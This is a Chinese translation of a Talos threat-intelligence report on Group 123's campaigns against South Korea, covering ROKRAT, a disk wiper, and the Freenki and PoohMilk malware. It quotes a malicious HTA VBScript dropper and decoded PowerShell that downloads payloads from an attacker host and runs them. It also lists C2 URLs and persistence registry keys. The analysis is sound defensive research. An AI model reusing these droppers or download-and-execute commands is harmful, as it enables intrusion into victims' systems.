黑客攻擊焦點之韓國（上）

一、內容摘要

本文披露了2017年Group 123的惡意行動，我們確信Group 123應該為以下六項行動負責：

"Golden Time""Evil New Year""Are you Happy?""FreeMilk""North Korean Human Rights""Evil New Year 2018"

2018年1月2日，Evil New Year 2018開啟，此行動完全複製了2017年Evil New Year的方法。不同行動之間相互關聯，包括共享的代碼以及諸如PDB（程序資料庫）模式之類的編譯器部件。

據分析，Golden Time、兩個Evil New Year以及North Korean Human Rights行動專門針對韓國用戶。攻擊者結合Hancom Hangul Office Suite創建的惡意HWP文檔，使用魚叉式釣魚郵件。已經明確Group123使用了漏洞（例如CVE-2013-0808）或OLE對象的腳本語言。惡意文檔的目的是安裝並執行遠程管理工具（RAT）ROKRAT。有時攻擊者會直接將ROKRAT payload包含在惡意文檔中，而在其他行動中，攻擊者使用多階段感染過程：文檔只包含一個下載器，用於從攻陷的Web伺服器上下載ROKRAT。

此外，FreeMilk行動還針對數家非韓國金融機構。在該行動中，攻擊者利用了惡意的微軟Office文檔，而不是他們通常使用的Hancom文檔。文檔利用了較新的漏洞CVE-2017-0199，Group 123在漏洞公開披露不到一個月就開始使用了。在該行動中，攻擊者使用了兩個不同的惡意二進位文件：PoohMilk和Freenki，PoohMilk僅用於啟動Freenki，Freenki收集受感染系統的信息並下載後續階段的payload。該惡意軟體已於2016年在多個行動中使用，並與ROKRAT有一些代碼重疊。

最後，我們鎖定了與Group 123相關的第6次行動。我們將第6次活動命名為Are You Happy?。在該行動中，攻擊者部署了一個磁碟擦除器。這次攻擊的目的不僅是為了訪問遠程感染系統，而且還要擦除設備的第一個扇區。經確定擦除器是ROKRAT模塊。

攻擊者今年異常活躍，並持續關注韓國。該組織利用魚叉式釣魚和惡意文檔，其內容包括非常特定的語言，這表明它們是由以韓語為母語的人書寫的，而非翻譯而來。攻擊者具備如下能力：

· 工作流程中包含漏洞（針對Hangul和Microsoft Office）· 將payload分成多個階段來修正其行動· 使用攻陷的Web伺服器或合法的雲平台· 使用HTTPS通信增加流量分析難度· 為了攻擊第三方打造逼真的魚叉式釣魚行動（即Golden Time中的Yonsei 大學）· 不斷發展進步，2018年的新無文件功能就是一個證明

二、時間軸

這是2017年和2018年初的時間軸：

（一）2016.08-2017.03 : GOLDEN TIME

與Group 123的大多行動一樣，在本次行動中最初的攻擊媒介是魚叉式釣魚郵件。Talos確認了兩種不同類型的電子郵件。第一封電子郵件很有意思，我們看到攻擊者讚揚用戶加入了與「Korean Reunification and North Korean Conference」有關的小組。郵件正文解釋說，收件人應完成附件文檔以提供必要的反饋。而這是一個不存在的會議，經確定，與統一大會有關的最接近的會議是2017年1月的NYDA統一大會。發件人是kgf2016@yonsei.ac.kr，這是韓國全球論壇的聯繫電子郵件，一個獨立的會議。

在分析郵件頭部時，我們發現發送該郵件所使用的SMTP伺服器IP與延世大學相關聯。我們認為該電子郵件地址已被攻擊者控制並濫用。

惡意附件的文件名翻譯為「統一北韓會議_調查文檔」，郵件中特別加重了有關統一大會的文字。另外，在郵件正文中，攻擊者甚至告訴完成文檔的人將得到一筆「小費」。也許這就是嵌入式惡意軟體的禮物：

而第二封電子郵件的分析工作簡單的多。這封郵件來自Hanmail，Daum提供的免費韓國郵件服務，沒有像之前描述的那樣嘗試將發件人顯示為官方機構或個人。郵件主題是「請求幫助」，附件名是「我是北韓江原道文川市人」。我們懷疑攻擊者是想提醒讀者，文川市和它所在的江原省，包括韓國的江原道，都歸屬於1945年韓國分裂之前的一個統一的省。

第二封郵件里有一個故事，講的是一個名叫Ewing Kim的人，他在尋求幫助：

附件是兩個不同的HWP文檔，均利用了相同的漏洞（CVE-2013-0808），此漏洞專門針對EPS（封裝的PostScript）格式。shellcode的目的是從互聯網下載一個payload。

第一封電子郵件向受感染用戶顯示下面的誘餌文檔並下載如下payload：

hxxp://discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpg

第二封電子郵件向受感染用戶顯示下面的誘餌文檔，並下載如下payload：

hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg

兩種情形中，下載的payload均是ROKRAT惡意軟體。

這個ROKRAT變種的首要任務是檢查操作系統版本。如果檢測到Windows XP，則惡意軟體將執行無限循環，其目的是在運行Windows XP機器的沙箱系統打開時生成空報表。此外，它還會檢查以確定受感染系統是否正在運行常用分析工具。如果檢測到存在這些工具，惡意軟體會向合法網站發送兩個請求：

hxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg

hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4

亞馬遜網址顯示一個名為Men of War的二戰遊戲，而Hulu網址則是名為Golden Time的日本動漫節目：

ROKRAT的特徵之一就是使用社交網路和雲平台與攻擊者進行通信。這些平台是用來傳輸文件和接收命令。以下是該變種使用的平台列表：Twitter，Yandex和Mediafire。樣本中每個平台的令牌都是硬編碼的：

（二）2016.11-2017.01: EVIL NEW YEAR

2017年初，Group123開始了Evil New Year行動。在此次行動中，攻擊者試圖通過冒充來自韓國統一部的電子郵件來欺騙受害者，並專門提供了針對韓國的分析。這次行動從一些針對韓國目標的，包含惡意附件的釣魚郵件開始。下一步，Group 123試圖引誘受害者打開Hancom Hangul文檔附件。Hancom Hangul是一款主要在朝鮮半島使用的辦公套件，使用Hangul辦公文檔符合朝鮮半島的習慣。如果攻擊者使用微軟文檔，可能會引起受害者的懷疑。鑒於所使用的區域文件格式，一些安全軟體套件可能無法很好地檢測這些文件，這就為攻擊者提供了規避機會。

發給目標的文件名為「2017年北方新年分析」，並使用了韓國統一部的官方標誌。這是攻擊者所做的一個簡單決策，進一步表明了他們對該地區的熟悉程度。

這份文檔聲稱要討論朝鮮的新年活動，這可能是韓國的受害者很感興趣的。對於Group123的首選——政府目標而言，更是如此。文檔是一個誘餌，目的是誘使用戶打開嵌入頁面的惡意文檔。

攻擊者嵌入了兩個其它的鏈接，文檔敦促用戶點擊這些鏈接了解有關北韓新年活動的更多信息。第一個鏈接標記為"Comparison of Major Tasks in 16 & 17"，第二個鏈接標記為"Comparison between 16 & 17"。

打開這些鏈接後，將給用戶提供另一個誘餌Hangul文檔。文檔寫得很好，進一步增強了我們對新韓國攻擊者的信心。這些文檔包含用於釋放二進位文件的惡意OLE對象。

包含惡意的OLE（對象鏈接嵌入）對象：

初步分析確認文檔中兩個大小相似的OLE對象文件，從執行的角度來看完全相同。依據我們的分析，這兩個釋放的二進位文件被保存在下述位置並執行：

C:UsersADMINI~1AppDataLocalTempHwp (2).exe

C:UsersADMINI~1AppDataLocalTempHwp (3).exe

初步分析顯示，Group123的痕迹清除很馬虎，後來我們藉此來確定單獨的行動是同一個攻擊者所為，因為二進位文件中存在編譯組件：e:HappyWorkSourceversion 12T+MResultDocPrint.pdb。

釋放的二進位文件第二階段用來執行wscript.exe，同時注入shellcode到這此進程中。shellcode被嵌入到資源BIN中，用於解壓縮另一個PE32二進位文件，並使用wscript.exe執行。為此，Group123使用了眾所周知的技術，調用VirtualAllocEx，WriteProcessMemory和CreateRemoteThread這些Windows API。

從shellcode解壓的新PE32是一個初步偵察惡意軟體，用來與C2基礎設施進行通信，獲取最終的payload。此惡意軟體收集的信息包括以下內容：

機器名用戶名樣本所在的執行路徑BIOS模式唯一標識系統的隨機ID

Group123利用這種方法確定受害者是他們想要進一步針對的人，並基於偵察階段所獲信息確定後續需感染的人。

進一步的網路分析表明，二進位文件試圖連接到以下URL：

www[.]kgls[.]or[.]kr/news2/news_dir/index.php

www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg

韓國政府法律服務（KGLS）是管理韓國政府法律事務的合法政府機構。攻陷KGLS，攻擊者獲得了一個可信賴的平台來執行攻擊。

首先連接index.php，傳輸偵察階段所收集的信息。攻擊者使用這些信息來生成對應於受害者的特定文件名（基於隨機ID）。在本例中該值是02BC6B26 – 這意味著在攻擊者C2上為我們創建了一個02BC6B26_put.jpg文件。然後該文件被投放到受害者的機器上，重命名為officepatch.exe。由於攻擊者特別小心在意攻擊對象，在分析過程中我們沒有獲得該文件。

在調查中，我們確定攻擊者使用的其他命令和控制基礎設施。其中四個C2，分布在以下國家：3個C2 在韓國；1個C2在荷蘭。以下是所確定的基礎設施的全球地圖：

與之前的行動相反，攻擊者將偵察階段從ROKRAT payload中分離出來。此技巧很可能是為了規避檢測。對於Group 123的行為，這是一個有趣的調整。

（三）2017.03：ARE YOU HAPPY?

2017年3月，Group 123 組編寫了磁碟擦除器。該惡意軟體包含1個功能，目的是打開被感染系統的驅動器（\.PhysicalDrive0），並將以下數據寫入MBR：

在寫入緩衝區中可以看到Are you Happy?字元串。寫入MBR後，惡意軟體使用以下命令重啟計算機：c:windowssystem32shutdown /r /t 1。

重新啟動後，MBR向用戶顯示以下字元串：

關聯到其他行動是因為以下PDB路徑：D:HighSchoolversion 13VC2008(Version15)T+MT+MTMProjectReleaseErasePartition.pdb。

正如你所看到的，它完全合乎ROKRAT PDB。擦除器是名為ERSP.enc的ROKRAT模塊。我們假設ERSP意味著ERaSePartition，該模塊可由Group 123按需下載和執行。

樣本很有意思，因為2014年12月韓國發電廠襲擊事件中擦除器顯示的信息是Who Am I?。

（四）2017.05：FREEMILK

此次行動針對非韓國的金融機構，但與其他行動不同，此行動沒有使用HWP文件。它改為使用Office文檔。這個變化是因為Group 123在此次行動中沒有針對南韓，而是針對在世界上以微軟Office為標準的其他地方。

感染載體

攻擊者利用CVE-2017-0199下載並執行Microsoft Office中的惡意HTA文檔。 所使用的URL可在嵌入的OLE對象中找到：

hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]

下面是下載的HTA文檔的源代碼：

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><title>Bonjour</title><script language="VBScript">Set owFrClN0giJ = CreateObject("Wscript.Shell")Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..powershell.exe") ThenowFrClN0giJ.Run "powershell -nop -windowstyle hidden -executionpolicy bypass -encodedcommand JABjAD0AbgBlAHcALQBvA[...redacted...]H0AIAA=" ,0owFrClN0giJ.Run "cmd /c echo hta>%tmp%webbrowser1094826604.tmp", 0End IfSelf.Close</script><hta:applicationid="oHTA"applicationname="Bonjour"application="yes"></head></html>使用base64演算法解碼後，可得到最終的payload：$c=new-object System.Net.WebClient$t =$env:temp$t1=$t+"\alitmp0131.jpg"$t2=$t+"\alitmp0132.jpg"$t3=$t+"\alitmp0133.js"try { echo $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg",$t1) $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg",$t2) $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp",$t3) wscript.exe $t3 }catch { }

此腳本的目的是下載和執行一個Windows腳本和兩個編碼的payload。腳本用於解碼和執行下列payload：

Appach01.jpg (renamed: Windows-KB275122-x86.exe) 為 Freenki 樣本

Appach01.jpg (renamed: Windows-KB271854-x86.exe) 為 PoohMilk 樣本

PoohMilk 分析

PoohMilk樣本旨在執行兩個操作：

創建持久性以便在下次重啟時執行Freenki樣本。

檢查受感染機器上的特定文件。

第一個操作是創建一個註冊表項，以執行先前下載的Windows-KB275122-x86.exe文件，該文件使用參數help執行。下面是註冊表創建：

執行持久性的註冊表位置是：

HKCUSoftwareMicrosoftWindowsCurrentVersionRunWindows Update。在下次重啟時，惡意軟體將被執行。

第二個操作是檢查當前用戶的臨時目錄中是否存在wsatra.tmp文件。如果文件存在，則讀取內容以獲取具有LNK後綴的第二個文件的路徑。LNK文件最終用於識別第三個文件：一個ZIP文件，該文件檢索RTF文檔，並通過寫字板顯示給受感染的用戶。

這是PoohMilk樣本中的pdb路徑:E:BIG_POOHProjectmilkReleasemilk.pdb

Freenki 樣本

Freenki的目的是收集受感染系統的信息並下載第三個可執行文件。此樣本可用3個不同的參數來執行：

Help:由PoohMilk配置的值。在這種情況下，執行main函數。

Console:配置持久性，惡意軟體將在下次重啟時執行( HKCUSoftwareMicrosoftWindowsCurrentVersionRun
unsample )。

Sample: 惡意軟體先執行console命令，然後執行help命令。

使用WMI查詢收集信息：

此外，惡意軟體通過Microsoft Windows API列出正在運行的進程，使用混淆來隱藏諸如URL或User-Agent之類的字元串，演算法基於位運算（SUB 0x0F XOR 0x21），這是解碼後的數據：

hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.phpMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E; InfoPath.3)

下載的第三個payload使用相同的技術進行混淆，該文件是以PNGF開頭的假圖片。

本文翻譯自：http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html?m=1，如若轉載，請註明原文地址： http://www.4hou.com/info/news/10059.html 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀：